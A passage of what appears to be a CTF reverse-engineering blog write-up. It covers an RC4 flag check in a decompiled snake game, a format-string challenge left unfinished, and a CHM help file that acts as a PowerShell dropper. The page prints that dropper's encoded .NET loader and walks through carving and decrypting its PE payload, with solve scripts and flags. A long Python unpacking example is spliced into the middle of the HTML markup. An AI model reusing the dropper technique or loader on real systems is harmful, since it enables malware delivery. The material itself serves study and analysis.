class="number">0</span>], SCOPE_Y[<span class="number">1</span>])</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> (</span><br><span class="line"> v9, v10)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def get_food_style():</span><br><span class="line"> <span class="keyword">return</span> FOOD_STYLE_LIST[<span class="built_in">random</span>.randint(<span class="number">0</span>, <span class="number">2</span>)]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">DEFAULT_KEY = u'Y\xf3\x02\xc3%\x9a\x820\x0b\xbb%\x7f~;\xd2\xdc'</span><br><span class="line"></span><br><span class="line"><span class="function">def <span class="title">rc4</span><span class="params">(v11, key=DEFAULT_KEY, skip=<span class="number">1024</span>)</span>:</span></span><br><span class="line"><span class="function"> v12 </span>= <span class="number">0</span></span><br><span class="line"> v13 = bytearray([v14 <span class="keyword">for</span> v14 in range(<span class="number">256</span>)])</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> v15 in range(<span class="number">256</span>):</span><br><span class="line"> v12 = (v12 + v13[v15] + ord(key[(v15 % len(key))])) % <span class="number">256</span></span><br><span class="line"> v16 = v13[v15]</span><br><span class="line"> v17 = v13[v12]</span><br><span class="line"> v13[v15] = v13[v12]</span><br><span class="line"> v13[v12] = v16</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> v18 = <span class="number">0</span></span><br><span class="line"> v19 = []</span><br><span class="line"> <span class="keyword">if</span> skip > <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">for</span> v15 in 
range(skip):</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> v20 in v11:</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"> v21 = v13[((v13[v12] + v13[v18]) % <span class="number">256</span>)]</span><br><span class="line"> v19.append(chr(ord(v20) ^ v21))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> return ''.join(v19)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">def <span class="title">func</span><span class="params">(v22)</span>:</span></span><br><span class="line"><span class="function"> v23 </span>= rc4(v22)</span><br><span class="line"> if v23.encode('utf-8').hex() == '275b39c381c28b701ac3972338456022c2ba06c3b04f5501471c47c38ac380c29b72c3b5c38a7ec2a5c2a0':</span><br><span class="line"> return 'YOU WIN'</span><br><span class="line"> return 'YOU LOSE'</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">def <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"> pygame.init()</span><br><span class="line"> v24 = pygame.<span class="built_in">display</span>.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))</span><br><span class="line"> pygame.display.set_caption(u'\u8d2a\u5403\u86c7')</span><br><span class="line"> v25 = pygame.font.SysFont('SimHei', 24)</span><br><span class="line"> v26 = pygame.font.Font(None, 
<span class="number">72</span>)</span><br><span class="line"> v27, v28 = v26.size('GAME OVER')</span><br><span class="line"> v29 = True</span><br><span class="line"> v30 = init_snake()</span><br><span class="line"> v31 = create_food(v30)</span><br><span class="line"> v32 = get_food_style()</span><br><span class="line"> v33 = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line"> v34 = True</span><br><span class="line"> v35 = False</span><br><span class="line"> v36 = <span class="number">0</span></span><br><span class="line"> v37 = <span class="number">0.5</span></span><br><span class="line"> v38 = v37</span><br><span class="line"> v39 = None</span><br><span class="line"> v41 = False</span><br><span class="line"> <span class="keyword">for</span> v40 in pygame.event.<span class="built_in">get</span>():</span><br><span class="line"> <span class="keyword">if</span> v40.type == QUIT:</span><br><span class="line"> sys.<span class="built_in">exit</span>()</span><br><span class="line"> elif v40.type == KEYDOWN:</span><br><span class="line"> <span class="keyword">if</span> v40.key == K_RETURN:</span><br><span class="line"> <span class="keyword">if</span> v34:</span><br><span class="line"> v35 = True</span><br><span class="line"> v34 = False</span><br><span class="line"> v29 = True</span><br><span class="line"> v30 = init_snake()</span><br><span class="line"> v31 = create_food(v30)</span><br><span class="line"> v32 = get_food_style()</span><br><span class="line"> v33 = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line"> v36 = <span class="number">0</span></span><br><span class="line"> v39 = time.time()</span><br><span class="line"> elif v40.key == K_SPACE:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v34:</span><br><span class="line"> v41 = <span class="keyword">not</span> v41</span><br><span class="line"> elif v40.key in (K_w, 
K_UP):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> v33 = v33[<span class="number">1</span>] <span class="keyword">or</span> (<span class="number">0</span>, <span class="number">-1</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> elif v40.key in (K_s, K_DOWN):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> v33 = v33[<span class="number">1</span>] <span class="keyword">or</span> (<span class="number">0</span>, <span class="number">1</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> elif v40.key in (K_a, K_LEFT):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v33[<span class="number">0</span>]:</span><br><span class="line"> v33 = (<span class="number">-1</span>, <span class="number">0</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> elif v40.key in (K_d, K_RIGHT):</span><br><span class="line"> <span class="keyword">if</span> v29:</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v33[<span class="number">0</span>]:</span><br><span class="line"> v33 = (<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line"> v29 = False</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v24.<span class="built_in">fill</span>(BGCOLOR)</span><br><span class="line"> <span class="keyword">for</span> v42 in range(SIZE, SCREEN_WIDTH, SIZE):</span><br><span class="line"> pygame.draw.<span class="built_in">line</span>(v24, BLACK, (v42, SCOPE_Y[<span class="number">0</span>] * SIZE), (v42, SCREEN_HEIGHT), LINE_WIDTH)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> v43 in range(SCOPE_Y[<span 
class="number">0</span>] * SIZE, SCREEN_HEIGHT, SIZE):</span><br><span class="line"> pygame.draw.<span class="built_in">line</span>(v24, BLACK, (<span class="number">0</span>, v43), (SCREEN_WIDTH, v43), LINE_WIDTH)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v44 = v34 <span class="keyword">or</span> time.time()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> v44 - v39 > v38 <span class="keyword">and</span> <span class="keyword">not</span> v41:</span><br><span class="line"> v29 = True</span><br><span class="line"> v39 = v44</span><br><span class="line"> v45 = (v30[<span class="number">0</span>][<span class="number">0</span>] + v33[<span class="number">0</span>], v30[<span class="number">0</span>][<span class="number">1</span>] + v33[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">if</span> v45 == v31:</span><br><span class="line"> v30.appendleft(v45)</span><br><span class="line"> v36 += v32[<span class="number">0</span>]</span><br><span class="line"> v38 = v37 - <span class="number">0.03</span> * (v36 <span class="comment">// 100)</span></span><br><span class="line"> v31 = create_food(v30)</span><br><span class="line"> v32 = get_food_style()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> SCOPE_X[<span class="number">0</span>] <= v45[<span class="number">0</span>] <= SCOPE_X[<span class="number">1</span>]:</span><br><span class="line"> <span class="keyword">if</span> SCOPE_Y[<span class="number">0</span>] <= v45[<span class="number">1</span>] <= SCOPE_Y[<span class="number">1</span>]:</span><br><span class="line"> <span class="keyword">if</span> v45 <span class="keyword">not</span> in v30:</span><br><span class="line"> v30.appendleft(v45)</span><br><span class="line"> v30.pop()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span 
class="line"> v34 = True</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v34:</span><br><span class="line"> pygame.draw.<span class="built_in">rect</span>(v24, v32[<span class="number">1</span>], (v31[<span class="number">0</span>] * SIZE, v31[<span class="number">1</span>] * SIZE, SIZE, SIZE), <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">for</span> v46 in v30:</span><br><span class="line"> pygame.draw.<span class="built_in">rect</span>(v24, DARK, (v46[<span class="number">0</span>] * SIZE + LINE_WIDTH, v46[<span class="number">1</span>] * SIZE + LINE_WIDTH, SIZE - LINE_WIDTH * <span class="number">2</span>, SIZE - LINE_WIDTH * <span class="number">2</span>), <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print_text(v24, v25, <span class="number">30</span>, <span class="number">7</span>, f<span class="string">"speed: {v36 // 100}"</span>)</span><br><span class="line"> print_text(v24, v25, <span class="number">450</span>, <span class="number">7</span>, f<span class="string">"score: {v36}"</span>)</span><br><span class="line"> <span class="keyword">if</span> v36 >= <span class="number">5192296858534827628530496329220096</span>:</span><br><span class="line"> v47 = flag</span><br><span class="line"> print_text(v24, v26, (SCREEN_WIDTH - v27) <span class="comment">// 2, (SCREEN_HEIGHT - v28) // 2, func(v47), RED)</span></span><br><span class="line"> <span class="keyword">if</span> v34:</span><br><span class="line"> <span class="keyword">if</span> v35:</span><br><span class="line"> print_text(v24, v26, (SCREEN_WIDTH - v27) <span class="comment">// 2, (SCREEN_HEIGHT - v28) // 2, 'GAME OVER', RED)</span></span><br><span class="line"> pygame.<span class="built_in">display</span>.update()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == 
'__main__':</span><br><span class="line"> main()</span><br><span class="line"><span class="meta"># okay decompiling main.pyc</span></span><br></pre></td></tr></table></figure></div><p>The flag check at the end, func(), is nothing more than RC4 over the input compared against a hard-coded ciphertext. RC4 is a stream cipher, so encryption and decryption are the same XOR against the same keystream: running the program's own rc4() (same embedded key, same 1024 discarded keystream bytes) over the stored ciphertext yields the flag. Playing for it is not an option, since the in-game condition is a score of at least 5192296858534827628530496329220096 (2^112). It is also a reminder that "encrypt and compare" is no protection for a secret: whoever holds the bytecode holds the key, whereas comparing a one-way hash of the expected input would have revealed nothing.</p><p>Despite the u'' prefixes in the uncompyle output, this bytecode is Python 3 (f-strings and bytes.hex() do not exist in Python 2), so the detail to get right is the str/bytes boundary: rc4() builds a str whose code points are the XORed bytes (0 to 255), and func() compares the UTF-8 encoding of that str, which is why the stored hex contains c2/c3 lead bytes.</p><blockquote><p>On the encoding issue, see:</p><p><a href="https://pycoders-weekly-chinese.readthedocs.io/en/latest/issue5/unipain.html" target="_blank" rel="noopener">Unicode之痛 (Unipain) — PyCoder’s Weekly CN</a></p><p><a href="https://www.cnblogs.com/yangmingxianshen/p/7990102.html" target="_blank" rel="noopener">On unicode and str in Python 2 versus str and bytes in Python 3 - 明王不动心 - 博客园</a></p></blockquote><p>Because the decompiler already converted everything to Python 3, the solve script is written in Python 3 as well: decode the hex, undo the UTF-8 step to recover the str that func() produced, and feed that str back into rc4().</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">DEFAULT_KEY = <span class="string">u'Y\xf3\x02\xc3%\x9a\x820\x0b\xbb%\x7f~;\xd2\xdc'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rc4</span><span class="params">(v11, key=DEFAULT_KEY, skip=<span class="number">1024</span>)</span>:</span></span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> v13 = bytearray([v14 <span class="keyword">for</span> v14 <span class="keyword">in</span> range(<span class="number">256</span>)])</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> v15 <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line"> v12 = (v12 + v13[v15] + ord(key[(v15 % len(key))])) % <span class="number">256</span></span><br><span class="line"> v16 = v13[v15]</span><br><span class="line"> v17 = v13[v12]</span><br><span class="line"> v13[v15] = v13[v12]</span><br><span class="line"> 
v13[v12] = v16</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> v18 = <span class="number">0</span></span><br><span class="line"> v19 = []</span><br><span class="line"> <span class="keyword">if</span> skip > <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">for</span> v15 <span class="keyword">in</span> range(skip):</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> v20 <span class="keyword">in</span> v11:</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"> v21 = v13[((v13[v12] + v13[v18]) % <span class="number">256</span>)]</span><br><span class="line"> v19.append(chr(ord(v20) ^ v21))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">''</span>.join(v19)</span><br><span class="line"><span class="comment"># def func(v22):</span></span><br><span class="line"><span class="comment"># v23 = rc4(v22)</span></span><br><span class="line"><span class="comment"># if v23.encode('utf-8').hex() == '275b39c381c28b701ac3972338456022c2ba06c3b04f5501471c47c38ac380c29b72c3b5c38a7ec2a5c2a0':</span></span><br><span class="line"><span class="comment"># return 'YOU WIN'</span></span><br><span class="line"><span class="comment"># return 'YOU LOSE'</span></span><br><span class="line"></span><br><span 
class="line"><span class="comment"># -=-=-= everything above is the original rc4() lifted from the decompiled source -=-=-=</span></span><br><span class="line"></span><br><span class="line">cipher=<span class="string">'275b39c381c28b701ac3972338456022c2ba06c3b04f5501471c47c38ac380c29b72c3b5c38a7ec2a5c2a0'</span></span><br><span class="line">flag=bytes.fromhex(cipher).decode(<span class="string">'utf-8'</span>) <span class="comment"># undo func()'s .encode('utf-8'): back to the str that rc4() produced</span></span><br><span class="line">print(rc4(flag)) <span class="comment"># RC4 is symmetric: the same key and skip recover the plaintext</span></span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/g6xezQMJZ1KrtHG.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{snake_bao_is_really_lucky}</strong></p><h2 id="print【TODO】"><a href="#print【TODO】" class="headerlink" title="print【TODO】"></a>print【TODO】</h2><p>【TODO】</p><p>I think I roughly know how this one is meant to be done, but I just can't pull it off (waiting for a write-up...</p><p>Posting my notes from the time: looking at the logic, the only function of interest is sprintf; apart from it there is no other operation that could overwrite memory.</p><p>I stepped through it in a debugger; my guess is a write through a sprintf format-string vulnerability?</p><blockquote><p><a href="https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" target="_blank" rel="noopener">Introduction to format string exploits</a></p><p><a href="https://www.cnblogs.com/liufang/p/3741943.html" target="_blank" rel="noopener">sprintf - stm32学习中 - 博客园</a></p></blockquote><p>I'm too weak at pwn to have worked out how to write to output (even though this is a reversing challenge orz</p><p>The setup function initialises some format strings; the main part is loop(): control input (the input string, all printable characters, length &gt; 11) so that output != the original output and output-1 == 48 (‘0’).</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/ZnCHa4r7zSyE6mF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><hr><h1 id="12-27-HarmonyOS和HMS专场"><a href="#12-27-HarmonyOS和HMS专场" class="headerlink" title="[12.27] HarmonyOS and HMS Track"></a>[12.27] HarmonyOS and HMS Track</h1><h2 id="re123"><a href="#re123" class="headerlink" title="re123"></a>re123</h2><p>The file command identifies the sample as MS Windows HtmlHelp Data, that is a .chm, and the file header (the ITSF magic) says the same.</p><figure class="image-bubble"> <div class="img-lightbox"> <div 
class="overlay"></div> <img src="https://i.loli.net/2021/01/11/bF3KO1qoyBtlYsp.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/hbBzlWCVeYx7Hqo.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>So give it the .chm extension.</p><p>A commonly used tool for CHM files is the decompiler ChmDecompiler, which extracts every source file inside a CHM (web pages, text, images, nested CHM, ZIP, EXE and so on) and restores the complete original directory structure (quoting its own blurb).</p><p>Open re.chm in ChmDecompiler and extract it; a folder with four files appears (only three of them are original, the .hhp project file is generated by ChmDecompiler).</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/BpgOKqmGQkyJrsj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Going through them one by one, doc.htm contains a suspicious Item1 entry.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/wKSVb18PU3mkIyu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It reads like PowerShell syntax (and like a Windows backdoor, with all those No* switches). In a CHM, Item1 is the argument of the HTML Help shortcut object (Command: ShortCut), the classic way a malicious help file launches a program the moment the topic is displayed, so this CHM is effectively a dropper.</p><p>A quick check shows the command simply base64-decodes the long blob that follows; decoding that blob under WSL gives</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/bOivFhTxp26oklP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>a piece of .NET code (the white text in the screenshot).</p><p>Microsoft's documentation explains what it does: the base64-decoded bytes are read through a DeflateStream, so decode the inner base64 in a script, inflate it and print the result line by line.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> zlib</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">deflate</span><span 
class="params">(data)</span>:</span></span><br><span class="line"> <span class="comment"># .NET DeflateStream emits raw Deflate (no zlib header); fall back to a zlib-wrapped stream</span></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">return</span> zlib.decompress(data, -zlib.MAX_WBITS)</span><br><span class="line"> <span class="keyword">except</span> zlib.error:</span><br><span class="line"> <span class="keyword">return</span> zlib.decompress(data)</span><br><span class="line"></span><br><span class="line">code=<span class="string">'TY5BC4IwGIbvgv9hjB2McJhEhNChJMGTkN2qg7qvFHQT/bL575vpoV2/53n2skJJBInkQG5xwqOqhkcQXCATx7q+gkaHsvYj7kIVvCgburItVgm9MTxbVB5LATp5OlQvb6IMV0LdQvdPpu+8x66SL2eOrMl+Ck7naUA69ggND5UcoEOzI+pUc8p62G3TRZubv34K6IbLespADoGR27vv+R7HpqXzt8Q9y0IJI5N8RLCtLw=='</span></span><br><span class="line">de_code=deflate(base64.b64decode(code)).decode()</span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> de_code.split(<span class="string">'\r\n'</span>):</span><br><span class="line"> print(x)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/TZFWzoduARpwx83.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The logic is now obvious: take the part of doc.chm (presumably the original re.chm) that follows the marker "xxxxxxxx" and base64-decode it to obtain a file.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/E67OUyQPgYNV1Xm.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Copy everything after the marker by hand into cont.txt, base64-decode it and save the result as theFile.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">base64 -d cont.txt > theFile</span><br></pre></td></tr></table></figure></div><p>Inspecting theFile suggests a PE executable (the chain did start from a PowerShell command, after all), so repair the damaged file header (a PE image begins with the MZ signature) and rename it theFile.exe.</p><figure class="image-bubble"> 
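The unpacking chain above, from the Item1 command down to the carved executable, as an added Python example (it is not the write-up's own script and uses only the standard library). It decodes a PowerShell encoded command, inflates a DeflateStream stage the way the .NET snippet does, carves the base64 payload that follows the "xxxxxxxx" marker and validates the MZ/PE header before anything is run. The marker and STAGE2_B64 are taken from the write-up; the stage-1 script, the PE image and the CHM container are constructed fixtures, and since the page does not show the exact switches of the Item1 command, the sample encodes stage 1 the way -EncodedCommand expects (UTF-16LE), which is an assumption about the sample, not a fact about the challenge.

```python
"""Unpack the CHM -> PowerShell -> Deflate -> base64 -> PE chain from re123.
Added example, not the write-up's script; standard library only."""
import base64
import re
import struct
import zlib

MARKER = b"xxxxxxxx"  # separator the dropped .NET loader searches for (from the write-up)

# Stage-2 blob as quoted in the write-up: a raw Deflate stream, base64-encoded.
STAGE2_B64 = (
    "TY5BC4IwGIbvgv9hjB2McJhEhNChJMGTkN2qg7qvFHQT/bL575vpoV2/53n2skJJBInkQG5xwqOqhkcQXCATx7q+gkaHsvYj7kIVvCgburItVgm9MTxbVB5LATp5OlQvb6IMV0LdQvdPpu+8x66SL2eOrMl+Ck7naUA69ggND5UcoEOzI+pUc8p62G3TRZubv34K6IbLespADoGR27vv+R7HpqXzt8Q9y0IJI5N8RLCtLw=="
)


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (UTF-16LE, which is why a
    plain `base64 -d` shows a NUL after every character); fall back to UTF-8."""
    raw = base64.b64decode(b64)
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def inflate_b64(b64: str) -> bytes:
    """Undo [IO.Compression.DeflateStream]: .NET writes raw Deflate without a
    zlib header, so try wbits=-15 first and only then a zlib-wrapped stream."""
    data = base64.b64decode(b64)
    try:
        return zlib.decompress(data, -zlib.MAX_WBITS)
    except zlib.error:
        return zlib.decompress(data)


def stage2_script() -> str:
    """The .NET loader hidden behind the Item1 command, as text."""
    return inflate_b64(STAGE2_B64).decode("utf-8")


def carve_payload(container: bytes, marker: bytes = MARKER) -> bytes:
    """Base64-decode whatever follows `marker` in `container` (the CHM itself),
    ignoring line breaks or other non-alphabet bytes in the tail."""
    idx = container.find(marker)
    if idx < 0:
        raise ValueError("marker not found")
    tail = re.sub(rb"[^A-Za-z0-9+/=]", b"", container[idx + len(marker):])
    return base64.b64decode(tail)


def pe_header_offset(data: bytes) -> int:
    """Check the MZ and PE signatures and return e_lfanew; a dump with a damaged
    DOS header (what had to be patched by hand above) is rejected here."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    if len(data) < 0x40:
        raise ValueError("DOS header truncated")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew


def is_valid_pe(data: bytes) -> bool:
    try:
        pe_header_offset(data)
        return True
    except ValueError:
        return False


def build_sample() -> dict:
    """Constructed fixtures (not the challenge files): a stage-1 script and its
    -EncodedCommand form, a minimal PE image, and a fake CHM that carries the
    image base64-encoded after MARKER."""
    script = "$d=[Convert]::FromBase64String('%s')" % STAGE2_B64
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    pe = bytearray(b"MZ" + b"\0" * 0x3E)            # 0x40-byte DOS header
    struct.pack_into("<I", pe, 0x3C, 0x80)           # e_lfanew: PE header at 0x80
    pe += b"\0" * (0x80 - len(pe)) + b"PE\0\0" + struct.pack("<H", 0x8664)
    chm = b"ITSF" + b"\0" * 60 + MARKER + base64.b64encode(bytes(pe))
    return {"script": script, "encoded": encoded, "pe": bytes(pe), "chm": chm}


def run_chain(sample=None) -> dict:
    """Walk the chain end to end; the payload is rejected unless it is a PE."""
    sample = sample or build_sample()
    stage1 = decode_encoded_command(sample["encoded"])
    payload = carve_payload(sample["chm"])
    return {"stage1": stage1, "payload": payload, "pe_offset": pe_header_offset(payload)}


if __name__ == "__main__":
    r = run_chain()
    print(r["stage1"][:48] + "...")
    print("payload: %d bytes, PE header at 0x%x" % (len(r["payload"]), r["pe_offset"]))
    print(stage2_script())
```

Run it as a script to see the constructed chain walked end to end and the real stage-2 loader text printed; against a live sample, feed the decompiled doc.htm command to decode_encoded_command() and the CHM bytes to carve_payload(), and only hand the result to IDA once pe_header_offset() accepts it.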
<div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/6KcR42PaXnLY1rI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Open it in IDA; the FindCrypt plugin flags AES constants, and following them shows the AES S-box (the first two hits are the forward S-box, the third is the inverse S-box), so AES is in play.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/qmiDpj72GShebNA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/UZ6zyL2DmRIjx57.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Tracing the references back leads to the main function.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/r6NmeK9zjCbU87p.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>This is clearly the AES routine: sub_180001100() is the key expansion and sub_1800015B0() the block encryption.</p><p>It looks like stock, unmodified AES, and both the key and the ciphertext are present, so decrypt directly with a script (a single 16-byte block, so ECB with no IV is all that is needed).</p><p>Note that both are stored as integers (four dwords for the key, one 128-bit value for the ciphertext), so the bytes have to be assembled in little-endian order. A handy sanity check on the byte order: the key comes out as 2b7e1516 28aed2a6 abf71588 09cf4f3c, which is the AES-128 example key used throughout the appendices of FIPS-197.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">arr=[<span class="number">0x16157E2B</span>,<span class="number">0xA6D2AE28</span>,<span class="number">0x8815F7AB</span>,<span class="number">0x3C4FCF09</span>] <span class="comment"># the four key dwords as IDA shows them in memory</span></span><br><span class="line">key=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line"> key=hex(arr[i])[<span 
class="number">2</span>:]+key</span><br><span class="line">key=unhexlify(key)[::<span class="number">-1</span>] <span class="comment"># little-endian: reverse the byte order (same bytes as struct.pack('<4I', *arr))</span></span><br><span class="line">tmp=<span class="number">0x46C42084AA2A1B56E799D643453FF4B5</span></span><br><span class="line">cipher=unhexlify(hex(tmp)[<span class="number">2</span>:])[::<span class="number">-1</span>] <span class="comment"># one 128-bit block, also little-endian; tmp.to_bytes(16, 'little') is the robust form</span></span><br><span class="line">enc=AES.new(key,AES.MODE_ECB)</span><br><span class="line">print(enc.decrypt(cipher))</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/rqRu2Tfh1XG3oFA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{youcangues}</strong></p><h2 id="puzzle"><a href="#puzzle" class="headerlink" title="puzzle"></a>puzzle</h2><p>MIPS architecture.</p><p>After loading it into IDA, find the main function by cross-referencing the strings.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WwC3ns16k5dzTrv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/F8u7A1sJcbfWrmq.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>sub_401134() is an obvious check routine, so look there first.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/8xzfqYPDGF3Avdu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>At first glance it looks like a maze routine (</p><p>but stepping into sub_400FA8() shows that it just swaps two elements,</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20210111095327700.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>so it is not a maze; the logic is built around swapping.</p><p>As for dword_4A0010, it is an array of nine integers.</p><figure class="image-bubble"> <div 
